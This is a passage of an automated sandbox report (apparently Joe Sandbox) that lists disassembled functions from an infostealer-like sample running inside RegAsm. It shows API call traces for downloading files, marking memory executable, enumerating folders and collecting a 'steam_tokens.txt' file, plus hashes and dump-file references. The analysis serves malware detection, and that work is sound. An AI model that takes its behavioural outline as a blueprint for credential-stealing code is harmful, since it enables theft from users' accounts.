Part of subcall function 00410280: GetUserNameA.ADVAPI32(00000000,012B2DE0), ref: 004102A7

strcmp.MSVCRT ref: 00401075
ExitProcess.KERNEL32 ref: 00401082

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocNamestrcmp$ComputerExitUser
String ID:
API String ID: 2098570390-0
Opcode ID: 62a4c53fcb9bf593e476f24c714467af4436e90a2949d6c67d663f3053a85b1f
Instruction ID: 0e87048c4c810025046b2ff71762e49e4161a917b2b12ba1ada2c112072a28c4
Opcode Fuzzy Hash: 62a4c53fcb9bf593e476f24c714467af4436e90a2949d6c67d663f3053a85b1f
Instruction Fuzzy Hash: 5ED05BB1D0020256CF1077725D59A57229D9E11316740052FF840D7151F53DDCC4C27D

Uniqueness

Uniqueness Score: -1.00%

Function 00412A70 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 728COMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,012C3200,?,00428574,?,?,00000000,012C30E0,00000000,?,012C2920,?,00428570), ref: 004131EA

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00405850: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004058B5

Part of subcall function 00405850: StrCmpCA.SHLWAPI(?,012BF690,?,?,?,?,?,?,0000000D), ref: 004058ED
Part of subcall function 00405850: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00405912
Part of subcall function 00405850: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,0000000D), ref: 00405935
Part of subcall function 00405850: InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 0040594E
Part of subcall function 00405850: WriteFile.KERNEL32(00000000,?,000000FF,004203D8,00000000,?,?,?,?,?,?,0000000D), ref: 0040596E
Part of subcall function 00405850: InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 00405998
Part of subcall function 00405850: CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,0000000D), ref: 004059B4
Part of subcall function 00405850: InternetCloseHandle.WININET(00000000), ref: 004059BB
Part of subcall function 00405850: InternetCloseHandle.WININET(00000000), ref: 004059C2

Strings

F, xrefs: 00413482

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$File$CloseHandle$CreateOpenReadlstrcat$DirectoryWritelstrlen
String ID: F
API String ID: 3336520604-1304234792
Opcode ID: 64933d0dfc4c3c513359294a403d82db5c53117708ef4ed9c4664b0891a92b25
Instruction ID: c04eb2c2e67ebdd07284bf2178d9f41eb0a15058c49e10529a03e517fbc21d46
Opcode Fuzzy Hash: 64933d0dfc4c3c513359294a403d82db5c53117708ef4ed9c4664b0891a92b25
Instruction Fuzzy Hash: F6626D70805288EACB15E7E5C951BDDBBB85F19308F1480AEE54573282DF781B4CCBBA

Uniqueness

Uniqueness Score: -1.00%

Function 004069E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000040,6k@,?,?,?,?,00406B36), ref: 00406A55

Strings

6k@, xrefs: 00406A3F, 00406A42

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: 6k@
API String ID: 544645111-796046284
Opcode ID: 3cd70f51d592b6cc45cf5fa41d2a0a34811b31e58a1e5b5358e74f1d35610851
Instruction ID: 3aa464cb03e6a5daef80767049aabb5e2f81a0e8360af49d45380e9ae7790c68
Opcode Fuzzy Hash: 3cd70f51d592b6cc45cf5fa41d2a0a34811b31e58a1e5b5358e74f1d35610851
Instruction Fuzzy Hash: D211C6717141149FD724EF5CD8807A5F3D5FB0A300F51853AF94AE7280D639AC619B99

Uniqueness

Uniqueness Score: -1.00%

Function 004116F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Strings

?{B, xrefs: 00411717, 00411725

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID: ?{B
API String ID: 1699248803-2221931326
Opcode ID: e79796351f89c84eeedae8a54d9f090e4875ca2003630773c6d08024e9c7cace
Instruction ID: a4db74e52ac5736c466cc754061609f1f71d2f4092c2171fd08521da563084ac
Opcode Fuzzy Hash: e79796351f89c84eeedae8a54d9f090e4875ca2003630773c6d08024e9c7cace
Instruction Fuzzy Hash: F7F08231A1015CABDB10DB58DC51B9EB7FDDB44715F1042A6B908A32C0D6706F0A8B94

Uniqueness

Uniqueness Score: -1.00%

Function 00411690 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421FB8,000000FF,?,0040E94A,?,00000000,00000000,00000000), ref: 004116B7

Strings

J@, xrefs: 004116AB, 004116CB

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: J@
API String ID: 3188754299-3016281811
Opcode ID: d8f784d34889ff53bad89def2e75e44130d81317278a711d09a1317144491cd1
Instruction ID: cb1ed88cae5c2bc93b3530c0dbec5c822ac86073251ab52e185eaeaf3754e9f1
Opcode Fuzzy Hash: d8f784d34889ff53bad89def2e75e44130d81317278a711d09a1317144491cd1
Instruction Fuzzy Hash: 57F08271904658ABCB10DF58D901B99B768EB09B34F20476AFC35937D0C73D5A4086C4

Uniqueness

Uniqueness Score: -1.00%

Function 00410D30 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 00410D45

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Strings

Unknown, xrefs: 00410D64

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentProfilelstrcpy
String ID: Unknown
API String ID: 2831436455-1654365787
Opcode ID: 19b3602f314757e0faabd27852db01908b64834fb2260b4e9b2713c893113fbd
Instruction ID: bd33c02f77d4a78c5fd75930b30a6426299f1aaef28d0e4199fa1c9ffb468557
Opcode Fuzzy Hash: 19b3602f314757e0faabd27852db01908b64834fb2260b4e9b2713c893113fbd
Instruction Fuzzy Hash: 95E09232B0112857CB20AA98EC017EEB3ADDB48615F40017EFD0CD3281DE64591987D9

Uniqueness

Uniqueness Score: -1.00%

Function 19A904D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

Strings

failed to allocate %u bytes of memory, xrefs: 19A904E7

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: failed to allocate %u bytes of memory
API String ID: 0-1168259600
Opcode ID: 72fbb9a01ab4b6f1fdd95c5369e3ec52a7b92d8bb248152e4a30df73765acf14
Instruction ID: d9993a9f5e91cc38b2a088754d68eb2bf4b4320aa6e2ff987e49898d8c254cf2
Opcode Fuzzy Hash: 72fbb9a01ab4b6f1fdd95c5369e3ec52a7b92d8bb248152e4a30df73765acf14
Instruction Fuzzy Hash: 31D01276DCC23263C65111D4FD01FCA7D855B90EE1F0E8035FE8C59270D555A85983D3

Uniqueness

Uniqueness Score: -1.00%

Function 004157E0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

lstrlen.KERNEL32(00000000,00000000,?,00000000,0042839F,?,00000000,00422B08,000000FF,?,00418576,?), ref: 00415847

Part of subcall function 00415650: Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
Part of subcall function 00415650: CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
Part of subcall function 00415650: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743

Strings

Soft\Steam\steam_tokens.txt, xrefs: 0041585F

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleSleepThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 2356188485-3507145866
Opcode ID: 93ed9f98140693d4800eedd969e1417f7b0fe10de79906e738de47a47268dbad
Instruction ID: 057213227454b999660eab999351d39f71ae5e0843097ab142fe287d80eba7c3
Opcode Fuzzy Hash: 93ed9f98140693d4800eedd969e1417f7b0fe10de79906e738de47a47268dbad
Instruction Fuzzy Hash: 0B315E71800248EACB15EBA5C906BDDBBB8AB19308F50416EF905736C2DF7C1608CAB6

Uniqueness

Uniqueness Score: -1.00%

Function 19C499D8 Relevance: 3.1, APIs: 2, Instructions: 65COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,19C49AE5,19C9D448,0000000C), ref: 19C49A24
GetFileType.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,19C49AE5,19C9D448,0000000C), ref: 19C49A36

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: e7792d5d17f3c3f038125131809dc54509958648894357598400726dfa51c590
Instruction ID: 8dddcf221c427d74169f097371d1bdb93669c36e6b082b18bfc8d334c44b345f
Opcode Fuzzy Hash: e7792d5d17f3c3f038125131809dc54509958648894357598400726dfa51c590
Instruction Fuzzy Hash: F711E93B7047B15AC7304E3E9C896927AA5A757A70B3C075AD5FB875F1D230D642C241

Uniqueness

Uniqueness Score: -1.00%

Function 00411750 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C

Strings

c?A, xrefs: 0041175E

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: c?A
API String ID: 3494564517-3973445457
Opcode ID: d4369522996f46429e2b8f99c10d083dc768b15d27a8655d7000d2a46742015a
Instruction ID: 2f6bf1855c54fdaf0a86b6469ee1b170798d26e677cda476d0f85d276026e230
Opcode Fuzzy Hash: d4369522996f46429e2b8f99c10d083dc768b15d27a8655d7000d2a46742015a
Instruction Fuzzy Hash: 6EF0EC363406151787120F5D98405A7F79EEFD5E50714426BEB68DB3A5D925DC4042E4

Uniqueness

Uniqueness Score: -1.00%

Function 00408080 Relevance: 2.8, APIs: 2, Instructions: 263stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

lstrlen.KERNEL32(00000000), ref: 004082EB
lstrlen.KERNEL32(00000000), ref: 004082FF

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 6e9e9eb8b5b35013eda92946bae44ba3db7cf4b02ddd6fc1e07a456bea934820
Instruction ID: bb0ed716b75b08caa87d0d0c4c5828f057020467c4c4a3a58b00df7d74f44575
Opcode Fuzzy Hash: 6e9e9eb8b5b35013eda92946bae44ba3db7cf4b02ddd6fc1e07a456bea934820
Instruction Fuzzy Hash: 61B18F71800248EACB04EBA5C955BEDBBB8AF19304F14416EF906B3282DF785B08C779

Uniqueness

Uniqueness Score: -1.00%

Function 00417AE0 Relevance: 2.6, APIs: 2, Instructions: 144stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

lstrcat.KERNEL32(00000000,00000000), ref: 00417B37
lstrcat.KERNEL32(?,012C28A0), ref: 00417B56

Part of subcall function 00417800: wsprintfA.USER32 ref: 00417838
Part of subcall function 00417800: FindFirstFileA.KERNEL32(?,?), ref: 0041784F

Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,00428704), ref: 0041789C
Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,00428708), ref: 004178B6
Part of subcall function 00417800: wsprintfA.USER32 ref: 004178DB
Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,0042836E), ref: 004178EA
Part of subcall function 00417800: wsprintfA.USER32 ref: 00417907
Part of subcall function 00417800: PathMatchSpecA.SHLWAPI(?,?), ref: 00417937
Part of subcall function 00417800: lstrcat.KERNEL32(?,012BF680), ref: 00417963
Part of subcall function 00417800: lstrcat.KERNEL32(?,00428720), ref: 00417975
Part of subcall function 00417800: lstrcat.KERNEL32(?,?), ref: 00417983
Part of subcall function 00417800: lstrcat.KERNEL32(?,00428724), ref: 00417995
Part of subcall function 00417800: lstrcat.KERNEL32(?,?), ref: 004179A9

Part of subcall function 00417800: wsprintfA.USER32 ref: 00417926
Part of subcall function 00417800: FindNextFileA.KERNEL32(000000FF,?), ref: 00417A7A
Part of subcall function 00417800: FindClose.KERNEL32(000000FF), ref: 00417A8C

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID:
API String ID: 153043497-0
Opcode ID: 2387276b7b8b7c9664f1e86e25683a9f53ba26dbb885212bccb56154d41d0255
Instruction ID: de26392101a7e2bfefa2a23e194a6feb2729e77266eca017e9eca27cf8ee7779
Opcode Fuzzy Hash: 2387276b7b8b7c9664f1e86e25683a9f53ba26dbb885212bccb56154d41d0255
Instruction Fuzzy Hash: CD51AEB1900204ABCB04EF64CC42EEE7779AB49B04F10475EFD4567292DB789B88CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00406630 Relevance: 2.6, APIs: 2, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,00000000,?,?,?,00406AEE), ref: 0040668F
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,?,00406AEE), ref: 004066C3

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8e52c199fb5f4c61d9d5a6f440312f4a164c62c567e16456f99efbfb905a6b89
Instruction ID: 9c2575cd9cc3d2590bf8831d886fe8abcf871dfdbc43e53dc684b4ea66081c40
Opcode Fuzzy Hash: 8e52c199fb5f4c61d9d5a6f440312f4a164c62c567e16456f99efbfb905a6b89
Instruction Fuzzy Hash: 9B21B4B13407005BC334CF79DC91FA7BBEAEB80714F144A2EEA5AD63D0D67AA850C658

Uniqueness

Uniqueness Score: -1.00%

Function 00406AA0 Relevance: 1.6, APIs: 1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
